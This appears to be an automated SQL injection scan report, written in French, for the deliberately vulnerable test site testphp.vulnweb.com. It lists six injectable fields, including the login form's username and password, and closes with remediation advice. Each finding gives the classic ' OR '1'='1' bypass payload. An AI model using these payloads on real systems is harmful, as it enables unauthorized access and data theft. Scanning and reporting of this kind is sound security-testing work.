
==============================================
RAPPORT DE SCAN DE VULNÉRABILITÉS SQLi
==============================================
Date: 2025-03-03 21:08:31
Cible: http://testphp.vulnweb.com
URLs scannées: 11
Vulnérabilités trouvées: 6

VULNÉRABILITÉS DÉTECTÉES:

[1] Error-based SQLi
    URL: http://testphp.vulnweb.com
    Formulaire: http://testphp.vulnweb.com/search.php?test=query [Méthode: POST]
    Champ vulnérable: searchFor
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 21:07:59

[2] Error-based SQLi
    URL: http://testphp.vulnweb.com/login.php
    Formulaire: http://testphp.vulnweb.com/userinfo.php [Méthode: POST]
    Champ vulnérable: uname
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 21:08:10

[3] Error-based SQLi
    URL: http://testphp.vulnweb.com/login.php
    Formulaire: http://testphp.vulnweb.com/userinfo.php [Méthode: POST]
    Champ vulnérable: pass
    Payload efficace: ' OR '1'='1'--
    Détecté à: 2025-03-03 21:08:12

[4] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=1 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 21:08:22

[5] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=2 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 21:08:24

[6] Error-based SQLi
    URL: http://testphp.vulnweb.com/artists.php
    Formulaire: http://testphp.vulnweb.com/artists.php?artist=3 [Méthode: GET]
    Champ vulnérable: artist
    Payload efficace: ' OR '1'='1
    Détecté à: 2025-03-03 21:08:27

==============================================
RECOMMANDATIONS:
1. Utiliser des requêtes préparées ou des ORM
2. Valider et assainir toutes les entrées utilisateur
3. Implémenter un principe de moindre privilège pour les comptes DB
4. Activer les pare-feu applicatifs web (WAF)
==============================================
